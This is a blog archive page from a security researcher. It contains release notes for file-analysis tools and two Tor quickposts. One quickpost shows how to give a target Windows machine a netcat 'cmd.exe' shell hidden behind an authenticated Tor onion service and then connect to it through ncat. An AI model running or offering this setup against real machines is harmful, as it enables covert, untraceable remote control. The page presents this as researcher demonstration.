Didier Stevens

Tuesday 20 February 2018

Update: pecheck.py Version 0.7.2

Filed under: My Software,Update — Didier Stevens @ 0:00

This is a bug fix version.

pecheck-v0_7_2.zip (https)
MD5: 2A501CD2D15E1108B909B7FCEDFBDA13
SHA256: 9CACA5A41A84049FE6B0D5807A31B7FC5B1A5AC71B3FD3BE4EAC71A96BBDFB3E

Monday 19 February 2018

Update: oledump.py Version 0.0.33

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of oledump can output the content of all streams in JSON format, and has a new plugin for MSI files: plugin_msi.py.

oledump_V0_0_33.zip (https)
MD5: E5F879766B5C1C899E75E2F2A8ED9533
SHA256: 2B7C9565880F14E8A431F7819926EE801DE129458E682FAAF99FEF41AFA49934

Sunday 18 February 2018

Update: translate.py Version 2.5.3

Filed under: My Software,Update — Didier Stevens @ 0:00

I had to be sure that every 4th byte in a file was identical:

After some thinking, I thought I could use my translate program to select every 4th byte (position % 4 == 3) and then calculate byte statistics. But actually, translate.py can use a (complex) Python expression/program to translate each byte of a file, but it can not be used to select particular bytes. So I made a small change: if the Python expression used with translate.py returns value None (in stead of a numeric value), then the result is not send to output. This way, input bytes can be dropped/deleted.

translate_v2_5_3.zip (https)
MD5: F3C01FCA74A84F1712BAF187E9FE479F
SHA256: 4CA311456EDE5A43097D4E567F225CFF2A68D47B96A261FC935F2A0F1CD4EB0F

Monday 12 February 2018

Update: pdfid.py Version 0.2.4

Filed under: My Software,Update — Didier Stevens @ 0:00

This is a bug fix version for  bugs reported by different users, more details in history.

pdfid_v0_2_4.zip (https)
MD5: 36D5554BC881E7E21382ADA1305ED6F4
SHA256: C1DA287C9C06E3158F79CECF9C2E9A7773FC57FC92021F17B79DDD4B1E5DBB2A

Sunday 11 February 2018

Update: jpegdump.py Version 0.0.4

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of jpegdump adds option -e: extract jpeg images to disk.

jpegdump_V0_0_4.zip (https)
MD5: 496B6F2B0C0EEF919F7C6E20B9C1ADF6
SHA256: 5D150AE050610B6DB11FBE8B44E385A80800971AF1810F67531BB17A1373C770

Saturday 10 February 2018

Update: hash.py Version 0.0.2

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of hash.py can recurse into directories by using new option –recursedir.

hash_V0_0_2.zip (https)
MD5: 7C9EF6D52793D6FFAAF4EB6FCEB934B4
SHA256: F768BCBE035ADF099C2AFA41CADB2ABD9514D54E6D361AF5610277B8A70D6B7D

Tuesday 6 February 2018

Update: python-per-line version 0.0.3

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of python-per-line adds option -i to ignore errors when evaluating the provided Python expression.

python-per-line_V0_0_3.zip (https)
MD5: 40B787E184EBAAD91A9104BF1BF1BF1A
SHA256: 1D7CAE95B5EA169286E4B1528D834D814A474A86240B9975385968B2BADF59AB

Monday 5 February 2018

Quickpost: Remote Shell On Windows Via Tor Onion Service

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Creating a Tor onion service (aka hidden service) on a Windows Tor client.

I download the Tor expert bundle (this works with the Tor Browser too).

I create Tor configuration file torrc with these lines:

HiddenServiceDir C:\demo\Tor\service
HiddenServicePort 8662 127.0.0.1:12345

When Tor is started, folder C:\demo\Tor\Service will be created and populated with a couple of files (file hostname contains the .onion address created by Tor for this onion service).

The onion service will be listening on port 8662, and traffic will be forwarded to 127.0.0.1 port 12345.

It is possible to enable client authorization for this service (without client authorization, everybody who knows the .onion address and the port can connect to it). Basic client authorization uses a shared secret, and is configured with this line (torrc):

HiddenServiceAuthorizeClient basic testuser

I choose testuser as name for the client.

I start Tor with configuration file torrc like this: tor.exe -f torrc

The .onion address and client authorization cookie can be found in file hostname in the service folder:

nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

Keep the authorization cookie secret of course, I show it here for the demo.

Now start the service on the target Windows machine with nc.exe (I downloaded nc.exe years ago, I don’t have the original URL anymore, my version is 1.11 with MD5 ab41b1e2db77cebd9e2779110ee3915d):

nc -e cmd.exe -L -s 127.0.0.1 -p 12345

Tor expert bundle and nc.exe have no extra dependencies (like DLLs), and can be executed as normal user.

Now the target machine is ready.

On another machine, I start Tor with a configuration file containing the authorization cookie:

HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

And then I run ncat, because ncat.exe supports socks5 proxies (nc.exe doesn’t):

ncat.exe --proxy 127.0.0.1:9050 --proxy-type socks5 nybjuivgocveiyeq.onion 8662

This gives me a remote shell:

Remark that this does not work with version 7.60, apparently because of a regression bug:

libnsock select_loop(): nsock_loop error 10038: An operation was attempted on something that is not a socket.

 


Quickpost info


Saturday 3 February 2018

Quickpost: Code To Connect To Tor Onion Service

Filed under: Networking,Quickpost — Didier Stevens @ 20:16

I wanted a program to connect to Tor Onion Services (aka hidden services). It’s written in Python and uses the PySocks module:


import socks

PROXYHOST = 'localhost'
PROXYPORT = 9050

HOST = 'duskgytldkxiuqc6.onion'
PORT = 80

print('[*] Creating socket')
oSocket = socks.socksocket()

print('[*] Setting SOCKS5 proxy %s %s' % (PROXYHOST, PROXYPORT))
oSocket.set_proxy(socks.SOCKS5, PROXYHOST, PROXYPORT)

print('[*] Connecting %s %s' % (HOST, PORT))
oSocket.connect((HOST, PORT))

print('[*] Sending')
data = ['GET / HTTP/1.1', 'Host: %s' % HOST]
data = '\r\n'.join(data) + '\r\n\r\n'
print(data)
oSocket.sendall(data.encode('ascii'))

print('[*] Receiving')
print(oSocket.recv(0x1000))

print('[*] Closing')
oSocket.close()

print('[*] Done')

In line 13 I configure the socksocket to use Tor as a SOCKS5 proxy (Tor needs to be running).

From that line on, the code is the same as for the build-in socket module:


import socket

...
print('[*] Creating socket')
oSocket = socket.socket()

...

In this first example I build an HTTP GET request, that is something that doesn’t have to be done when module requests is used:


import requests

PROXYHOST = 'localhost'
PROXYPORT = 9050

HOST = 'duskgytldkxiuqc6.onion'

url = 'http://' + HOST
print('[*] Requesting %s' % url)
print(requests.get(url, proxies={'http': 'socks5h://%s:%s' % (PROXYHOST, PROXYPORT), 'https': 'socks5h://%s:%s' % (PROXYHOST, PROXYPORT)}).text)

print('[*] Done')


Quickpost info


Thursday 1 February 2018

Overview of Content Published In January

Filed under: Announcement — Didier Stevens @ 0:00

Here is an overview of content I published in January:

Blog posts:

YouTube videos:

SANS ISC Diary entries:

NVISO Blog posts:

Blog at WordPress.com.